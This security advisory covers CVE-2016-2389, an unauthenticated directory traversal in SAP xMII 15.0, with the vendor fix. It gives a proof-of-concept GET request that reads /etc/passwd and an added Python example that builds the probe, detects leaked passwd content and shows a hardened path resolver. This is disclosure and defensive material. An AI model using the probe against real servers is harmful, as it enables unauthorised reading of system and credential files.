| Title | Published | Views | Family |
|---|---|---|---|
| Vulnerability in the SAP NetWeaver software integration platform that allows an attacker to read arbitrary files | 17 Mar 2016 00:00 | – | bdu_fstec |
| CVE-2016-2389 | 8 Jul 2025 21:02 | – | circl |
| SAP NetWeaver Manufacturing Integration and Intelligence Catalog Traversal Vulnerability | 18 Feb 2016 00:00 | – | cnvd |
| CVE-2016-2389 | 16 Feb 2016 15:00 | – | cve |
| CVE-2016-2389 | 16 Feb 2016 15:00 | – | cvelist |
| SAP xMII 15.0 - Directory Traversal | 17 May 2016 00:00 | – | exploitdb |
| SAP xMII - directory traversal vulnerability | 29 Jul 2015 00:00 | – | erpscan |
| SAP xMII 15.0 - Directory Traversal | 17 May 2016 00:00 | – | exploitpack |
| SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion | 8 Jun 2026 04:09 | – | nuclei |
| CVE-2016-2389 | 16 Feb 2016 15:59 | – | nvd |
Application: SAP xMII
Versions Affected: SAP MII 15.0
Vendor URL: http://SAP.com
Bugs: Directory traversal
Sent: 29.07.2015
Reported: 29.07.2015
Vendor response: 30.07.2015
Date of Public Advisory: 09.02.2016
Reference: SAP Security Note 2230978
Author: Dmitry Chastuhin (ERPScan)
Description
1. ADVISORY INFORMATION
Title: SAP xMII – directory traversal vulnerability
Advisory ID: [ERPSCAN-16-009]
Risk: high priority
Advisory URL: https://erpscan.com/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
Date published: 09.02.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: [CWE-36]
Impact: SAP xMII directory traversal, arbitrary file read from the server
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-2389
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privilege needed to exploit) None (N)
UI : User Interaction None (N)
S : Scope Unchanged (U)
C : Impact to Confidentiality High (H)
I : Impact to Integrity None (N)
A : Impact to Availability None (N)
3. VULNERABILITY DESCRIPTION
An unauthenticated remote attacker can send a crafted request that makes the
server return the contents of arbitrary files the application has read access
to (for example /etc/passwd, or configuration files that may contain
credentials), which can then be used to escalate privileges.
4. VULNERABLE PACKAGES
SAP MII 15.0
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2230978.
6. AUTHOR
Dmitry Chastuhin (ERPScan)
7. TECHNICAL DESCRIPTION
An attacker can call the xMII Catalog servlet in GetFileList mode with a Path
parameter that contains ../ sequences. The path is joined to the catalog root
without a containment check, so enough ../ hops to climb above that root
(the exact count only has to exceed the root's depth) let the attacker list and
read files anywhere on the server file system. No authentication is required.
PoC
GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
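The following Python is an added example, not ERPScan's or SAP's code. It builds the probe request in the same shape as the PoC above, classifies a response as leaked or not, and sets the naive path join that produces this bug class beside a hardened resolver that refuses any path escaping the catalog root. The host name, the catalog root directory and the two resolver functions are assumptions for illustration; the sample responses are constructed, not captured from a real system.

```python
"""Probe builder and hardened path resolver for the xMII GetFileList traversal.

Added example: the URL layout follows the advisory PoC, but the resolver
functions are hypothetical illustrations of the bug class, not SAP's code.
"""
import posixpath
import re
from urllib.parse import urlencode, urljoin

# Catalog servlet path and parameter names exactly as in the advisory PoC.
CATALOG_PATH = "/XMII/Catalog"
# A Unix passwd file leaking into the file listing is the tell-tale sign.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def build_probe_url(base_url, target="/etc/passwd", depth=12):
    """Return the GetFileList URL that asks for `target` via `depth` '../' hops.

    Assumption: base_url is the NetWeaver AS Java root, e.g. http://host:50000.
    depth=12 reproduces the advisory PoC; any value above the root depth works.
    """
    traversal = "Classes/" + "../" * depth + target.lstrip("/")
    query = urlencode({"Mode": "GetFileList", "Path": traversal}, safe="/")
    return urljoin(base_url, CATALOG_PATH) + "?" + query


def vulnerable_resolve(root, user_path):
    """The bug in one line: join the user path to the catalog root and hand
    it to the file system with no check that it is still under root."""
    return posixpath.normpath(posixpath.join(root, user_path))


def safe_resolve(root, user_path):
    """Hardened form: normalise lexically, then refuse anything outside root.

    A real fix should also resolve symlinks (os.path.realpath) before the
    containment check; this version is purely lexical so it runs offline.
    """
    if "\x00" in user_path or posixpath.isabs(user_path):
        raise ValueError("rejected path: %r" % user_path)
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError("path escapes catalog root: %r" % user_path)
    return candidate


def response_indicates_traversal(body):
    """Heuristic used by the probe: passwd content in the GetFileList reply."""
    return PASSWD_RE.search(body) is not None


def probe(base_url, fetch):
    """Run the check with a caller-supplied fetch(url) -> str (e.g. a
    requests.get wrapper), so the logic can be exercised without a network."""
    url = build_probe_url(base_url)
    return {"url": url, "vulnerable": response_indicates_traversal(fetch(url))}


# Constructed sample responses standing in for a vulnerable and a patched host.
SAMPLE_LEAK = ("root:x:0:0:root:/root:/bin/bash\n"
               "sapadm:x:1001:1001::/home/sapadm:/bin/false\n")
SAMPLE_CLEAN = '<?xml version="1.0"?><Rowsets><Rowset><Row/></Rowset></Rowsets>'

if __name__ == "__main__":
    # Assumed catalog root; only the depth relative to / matters for the demo.
    root = "/usr/sap/xmii/catalog"
    poc_path = "Classes/" + "../" * 12 + "etc/passwd"
    print(probe("http://host:50000", lambda url: SAMPLE_LEAK))
    print("naive join resolves to:", vulnerable_resolve(root, poc_path))
    try:
        safe_resolve(root, poc_path)
    except ValueError as exc:
        print("hardened resolver:", exc)
    print("legitimate path:", safe_resolve(root, "Classes/Report.xml"))
```

To run it against a live host, pass a real fetch callable (for example one that wraps `requests.get(url, timeout=10).text`); the response heuristic is deliberately narrow, so a host that blocks ../ but still returns a listing will correctly report as not vulnerable.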
8. REPORT TIMELINE
Sent: 29.07.2015
Reported: 29.07.2015
Vendor response: 30.07.2015
Date of Public Advisory: 09.02.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/